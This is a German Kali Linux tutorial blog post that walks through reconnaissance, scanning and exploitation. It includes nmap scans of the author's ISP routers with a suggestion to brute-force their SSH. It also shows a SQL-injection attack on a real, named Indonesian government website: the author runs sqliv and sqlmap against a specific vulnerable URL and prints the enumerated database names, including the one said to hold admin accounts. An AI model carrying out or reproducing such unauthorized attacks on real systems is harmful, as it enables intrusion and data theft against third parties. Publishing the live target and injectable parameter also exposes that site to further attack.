Kali Linux-Tutorial

Kali Linux Tutorial



Wenn Sie ein Experte sind oder zumindest mit Linux, Befehlen und Umgebung vertraut sind, gerade Kali Linux auf Ihrem Computer installiert haben, ein Master of Kali Linux oder ein Ethical Hacker werden möchten, dann sind Sie hier genau richtig. In diesem Artikel werde ich ein Kali Linux-Tutorial für Linux-Benutzer behandeln, die noch nicht mit Kali vertraut sind, und Sie mit einigen der grundlegenden Techniken zum Hacken und Sicherheitstests bei der Verwendung von Kali vertraut machen.

Was ist Kali-Linux?

Kali-Linux, ( Erstveröffentlichung am 13. März 2013 ), die früher als BackTrack bekannt war und von der Sicherheitsfirma Offensive Security entwickelt wurde, ist eine forensische und sicherheitsorientierte Distribution, die auf dem Testing-Zweig von Debian basiert. Kali Linux wurde für Penetrationstests, Datenwiederherstellung und Bedrohungserkennung entwickelt. Das Projekt wurde Anfang dieses Jahres auf ein rollierendes Release-Modell umgestellt, um den Benutzern der Distribution aktuellere Sicherheitsdienstprogramme zur Verfügung zu stellen. Kali Linux ist kostenlos und wird es immer bleiben. Es enthält über 600 Penetrationstest-Tools.







Warum Kali-Linux? Ist es das Richtige für Sie?

Kali Linux hat in letzter Zeit sehr an Popularität gewonnen. Und das hat einen Grund. Hacken ist zurück als cooles Ding in der Populärkultur und dies kann maßgeblich der TV-Serie Mr. Robot zugeschrieben werden. Die Popularität von Mr. Robot half Kali Linux dabei, neue Benutzer zu gewinnen. Leute, die kaum Kenntnisse über Linux oder etwas mit Computersicherheit haben, versuchen jetzt, Kali als ihre Haupt-Linux-Distribution zu verwenden.



Unsere fortschrittlichste Penetrationstest-Distribution aller Zeiten. – Kali Linux-Entwickler. (Es steht ganz oben auf der Hauptseite von Kali.org.) Was bekommen Sie aus dieser Aussage? Merken Sie das: APTD (Advanced Penetration Testing Distribution)? Es gibt hier buchstäblich keinen Begriff Hacking. Kali Linux ist dasselbe wie andere Linux-Distributionen. Einfach gesagt handelt es sich um eine Linux-Distribution voller sicherheitsrelevanter Tools, die sich an Netzwerk- und Computersicherheitsexperten richtet. Der Einsatz von Kali Linux konzentriert sich jedoch nur auf Sicherheit und Forensik.



Eine Linux-Distribution ist nichts anderes als ein Bundle, das den Linux-Kernel, eine Reihe von zentralen Dienstprogrammen und Anwendungen sowie einige Standardeinstellungen enthält. Kali Linux bietet also nichts Einzigartiges in dem Sinne, dass die meisten der bereitgestellten Tools auf jeder Linux-Distribution installiert werden könnten.





Kali Linux ist speziell auf die Anforderungen professioneller Penetrationstests und Sicherheitsaudits ausgerichtet. Es richtet sich an eine bestimmte Untergruppe von Linux-Benutzern. Pentester, Hacker usw. Es ist keine empfohlene Distribution, wenn Sie Kali für einen universellen Linux-Desktop für Entwicklung, Webdesign, Spiele, Büro usw. erwarten. Kali kann Ihnen einige Herausforderungen stellen, selbst wenn Sie ein erfahrener Linux-Benutzer sind .

VORGEHENSWEISE NACH DER INSTALLATION VON KALI LINUX

Nach der Installation von Kali Linux fragen Sie sich vielleicht, was Sie als nächstes tun sollen, oder?. Jeder steht vor diesem Problem, keine Sorge.



SCHRITT 1: EINRICHTEN DES REPOSITORYS

Erstens wissen Sie dies vielleicht bereits, aber es ist wichtig, das Repository richtig einzustellen. Wie gesagt, das Rolling-Release-Modell von Kali Linux ist bestrebt, den Benutzern der Distribution aktuellere Sicherheitsdienstprogramme zur Verfügung zu stellen. Wenn Sie Kali Linux frisch installiert haben, verweist das Repository im Allgemeinen auf die Medien, die Sie für die Installation verwenden. Um dies zu beheben, müssen Sie das Repository in das offizielle Kali Linux-Repository ändern. Die benötigte Datei befindet sich unter /etc/apt/sources.list . Öffnen Sie die Datei mit dem Leafpad-Texteditor und ersetzen Sie das Standard-Repository durch dieses offizielle Kali Rolling-Repository:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

SCHRITT 2: AKTUALISIEREN UND AKTUALISIEREN SIE IHR KALI LINUX

Nachdem Sie Ihr System aktualisiert und aktualisiert haben, synchronisieren Sie Ihr Kali Linux mit der neuesten Version. Öffnen Sie dazu das Terminal und geben Sie Folgendes ein:

apt update -y && apt upgrade -y && apt dist-upgrade 

Der Befehl apt update lädt die Paketlisteninformationen aus den Repositorys herunter und ruft sie ab und aktualisiert sie, um Informationen über die neuesten Versionen von Paketen und deren Abhängigkeiten zu erhalten.

Der Befehl apt upgrade lädt eine neuere Version der Pakete der installierten Kali Linux-Pakete herunter und installiert sie, solange keine Fehler in Abhängigkeiten auftreten.

Das apt dist-upgrade aktualisiert alle Pakete auf die neueste verfügbare Version, egal was passiert. Und installieren und entfernen Sie auch nach Bedarf Abhängigkeiten (installieren Sie natürlich Abhängigkeiten, um Pakete zu erfüllen, aber entfernen Sie auch Abhängigkeiten, die verwaist sind, wenn ein aktualisiertes Paket die Abhängigkeit nicht mehr benötigt.

GRUNDLEGENDES PENETRATIONSPRÜFKONZEPT MIT KALI LINUX

Nachdem Sie diese Schritte erfolgreich ausgeführt haben, können Sie mit Kali Linux basierend auf dem Zielsystem hauptsächlich drei Dinge tun, darunter:

  1. Hacking in drahtlosen Netzwerken – WLAN-Hacking, Phising, ARP-Vergiftung usw.
  2. Hacking von Web-Apps – SQL Injection, Cross-Site Request Forgery (CSRF), Web Phising usw.
  3. Geräte-Hacking – Nutze die Zielmaschine aus, um die Kontrolle über sie zu erlangen.

Ich schließe IoT-Hacking nicht ein, das bedeutet nicht, dass Kali Linux dafür keine Fähigkeit hat. Aber im wahrsten Sinne des Wortes könnte es auch zu Device Hacking gehören. Da das Gerät ein physisches Aussehen und eine Form hat. In diesem Tutorial habe ich die Grundkenntnisse von ihnen behandelt. Da Kali Linux riesig ist, passt es nicht in einen Artikel!

Sie müssen auch den Penetrationstestzyklus oder das Verfahren kennen. Sie sind:

  1. Aufklärung – Informationsbeschaffung
  2. Scannen
  3. Betrieb
  4. Nachausbeutung

DRAHTLOSES NETZWERK-HACKING MIT KALI LINUX

In Bezug auf das Hacken von drahtlosen Netzwerken kann das Opfer variieren. Denn drahtlose Netzwerke bestehen aus mehreren Dingen, wie ISP (Internet Service Provider), dem Router und seinen Partnern (Modem, Hub, Switch usw.) und den Clients (Benutzer, CCTV, Remote-Computer usw.). Sie haben auch verwundbare Möglichkeiten.

Das Internet ist eine große und komplexe Ansammlung von Netzwerkhardware, die durch Gateways miteinander verbunden sind. Die Verfolgung der Route, der Ihre Pakete folgen, ist wichtig, um zu wissen, wie Sie einen bestimmten Hostnamen oder eine bestimmte IP-Adresse erreichen.

Kali Linux hat ein integriertes Tool namens Traceroute. Traceroute verwendet das Time-to-Live-Feld des IP-Protokolls und versucht, von jedem Gateway entlang des Pfads zu einem Host eine ICMP TIME_EXCEEDED-Antwort zu erhalten. Traceroute versucht, die Route eines IP-Pakets zu einem Internet-Host zu verfolgen, indem es Probe-Pakete mit einer kleinen TTL (Time to Live) startet und dann auf eine ICMP-Zeitüberschreitungsantwort von einem Gateway wartet. Ich werde Ihnen ein Beispiel geben, wie Sie einen ISP-Router verfolgen können, der für die Verarbeitung unserer Verbindung mit Traceroute verwendet wird.

1. Anerkennung

Das Sammeln von Informationen ist die wichtigste Starthilfe, verpassen Sie diesen Schritt nicht. In diesem Schritt ist es unser Ziel, so viele nützliche Informationen wie möglich zu erhalten, und diese Informationen werden dann für weitere Schritte verwendet.

Öffnen Sie zuerst ein Terminal und geben Sie diesen Befehl ein, um die Straße zur Site zu verfolgen. In diesem Fall setze ich die Site auf google.com.

traceroute google.com 

Traceroute-Screenshot

2. Scannen

Sobald wir die Befehle starten, wird aufgelistet, wohin unser Paket der Reihe nach geht. Wie Sie oben sehen können, habe ich 3 Hops, von denen einer mein ISP-Server ist. Die erste IP auf der Liste ist mein Router, der als Gateway fungiert. Und die nächsten beiden gehören meinem ISP. Lassen Sie uns nun den Dienst überprüfen, den sie mit Nmap ausführen. Die Ziele, die wir scannen werden, sind also 10.152.192.1 und 10.13.223.102 . Im Terminal habe ich folgenden Befehl ausgeführt:

nmap -v -sS [IP Target] -Pn 

Lassen Sie uns das Argument des Befehls aufschlüsseln:

-v = Ausführlichkeitsmodus aktivieren

-sS = TCP-SYN-Scan-Technik verwenden

-Pn = Alle Hosts als online behandeln – Host-Erkennung überspringen

Und hier ist das Ergebnis, das wir bekommen haben.

nmap-Screenshot 2

Leider alle Ports an 10.152.192.1 gefiltert werden, bedeutet dies, dass alle eingehenden TCP-Verbindungen von IDS oder Firewall auf dieser IP blockiert werden. Lassen Sie uns nun einen weiteren Scan zum zweiten Ziel durchführen.

nmap-Screenshot 1

3. Bedienung

In diesem Verfahren soll nicht die eigentliche Verwertung durchgeführt werden, sondern ich zeige Ihnen wie. Basierend auf dem obigen Ergebnis des Nmap-Scans wissen wir, dass diese IP einen SSH-Server auf Port 22 hat und offen ist. Es ist offen für Bruteforce, haha! Wir haben die Lücke gefunden, dieser SSH-Server ist die mögliche Lücke, in die wir versuchen könnten, Zugang zu erhalten. Es gibt mehrere Tools in Kali Linux, die Bruteforce- oder Wörterbuchangriffe gegen das SSH-Protokoll unterstützen. Die beliebteste und mächtigste ist Hydra.

Ok, das war ein grundlegendes Verfahren, um einen Penetrationstest gegen einen Zielserver durchzuführen, der in unserem Beispiel hier mein ISP-Server ist.

WEB-APPS HACKEN MIT KALI LINUX

Wenn Sie sich dafür begeistern, können Sie Ihre Hacking-Umgebung einrichten, indem Sie DWVA (Damn Vulnerable Web App) in Ihrem Kali Linux installieren. Es ist eine PHP/MySQL-Webanwendung, die eine Reihe von verwundbaren Löchern aufweist. Sein Hauptziel besteht darin, Sicherheitsexperten zu helfen, ihre Fähigkeiten und Tools in einem rechtlichen Umfeld zu testen, und Webentwicklern zu helfen, die Prozesse zur Sicherung von Webanwendungen besser zu verstehen. Sie können DWVA kostenlos auf Github hier herunterladen: https://github.com/ethicalhack3r/DVWA.

Im Moment zeige ich Ihnen, wie Sie Web Apps Hacking auf einer echten Website durchführen. Aber versprich mir, dass es sich nur auf pädagogische Zwecke beschränkt. Wir simulieren einen echten Angriff auf eine echte Site mit SQL-Injection.

Voraussetzung

Abgedeckte Werkzeuge:

– Whatweb (vorinstalliert)

– Nmap (vorinstalliert)

– SQLiv (manuell installieren)

– SQLMap (vorinstalliert)

Wir brauchen ein weiteres zusätzliches Tool, das hier auf Github verfügbar ist: https://github.com/Hadesy2k/sqliv, installieren Sie es zuerst auf unserem Kali Linux. Dieses Tool namens SQLiv kann gezielte Scans durchführen, indem es eine bestimmte Domäne bereitstellt (mit Crawling). Geben Sie das Terminal ein:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

Ziel: www.trenggalekkab.go.id

1. Anerkennung

Sammeln Sie so viele nützliche Informationen wie möglich. Wir könnten die Webseite öffnen und feststellen, welche Anwendung auf dieser Site ausgeführt wird. Lassen Sie uns zunächst überprüfen, um welche Art von Website es sich handelt. Wir werden whatweb verwenden, um das zu tun.

whatweb www.trenggalekkab.go.id 

Welcher Web-Screenshot

Wie Sie im Ergebnis oben sehen können, befindet sich das Ziel in Indonesien. Es läuft Apache v2.2.27 auf seinem Webserver und hat auch PHP v5.4.31 , es hat eine IP-Adresse 103.247.21.142 . Gut, notieren Sie sich das. Möglicherweise müssen Sie die Webseite besuchen, nach der erstellten Datei oder Seite, nach URL-Parametern oder sogar nach dem Anmeldeformular suchen. Im Moment benötigen wir diese IP-Adresse für den nächsten Scan-Schritt.

2. Scannen

Wie zuvor verwenden wir erneut Nmap, um zu scannen, welche Ports und Dienste auf dem Ziel ausgeführt werden.

nmap -v -sS 103.247.21.142 

Und hier ist das Ergebnis, das wir erhalten haben:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

Es gibt eine Reihe von offenen Ports, die jeden Dienst auf dem Ziel verarbeiten, aber der auffälligste ist der MySQL-Dienst auf Port 3306. Es wird angezeigt, dass diese Site verwendet mysql ihre Informationen in Datenbanken zu verwalten. Dann frage ich mich, ob es auf dieser Site irgendwelche SQL-Injection-Schwachstellen gibt. Also scanne ich die Site erneut mit SQLiv, das wir gerade installiert haben. Ich habe den Befehl eingegeben:

sqliv -t www.trenggalekkab.go.id 

SQLHacking-Screenshot1

Wir haben 2 mögliche SQL-gefährdete URLs auf dieser Site gefunden. Notieren Sie sich diese URLs.

3. Bedienung

Ok, wir haben SQL-gefährdete URLs und sind bereit zur Ausführung. Dazu verwenden wir SQLMap. Die Syntax lautet:

sqlmap [Vulnerable URL] --dbs 

Der Befehl sollte so aussehen:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

Das Argument –dbs weist SQLMap an, Zieldatenbanken abzurufen. Hier ist die Ausgabe, die wir erhalten haben:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

SQLMap hat 2 Datenbanken gefunden, aber nur eine davon, die sensible Daten enthält, z. B. ein Konto mit Administratorberechtigungen. Das ist auf trengkab_trg. Nachdem wir die Datenbanken gefunden haben, gibt es noch einen weiteren Schritt, den wir tun sollten. Das heißt, die Tabellen und Spalten zu finden und der letzte Schritt besteht darin, die Daten zu sichern. Ich werde Ihnen hier in diesem Abschnitt nicht zeigen, wie Sie dieses Ziel verwenden. Zumindest kennen Sie die Grundidee des Angriffszyklus und die Verwendung einiger Tools.

GERÄTE-HACKING

In einem zukünftigen Artikel auf dieser Website werden wir das Hacken von Geräten behandeln. Bleiben Sie dran. Als Vorwarnung sollten Sie sicherstellen, dass Sie dafür etwas Python kennen.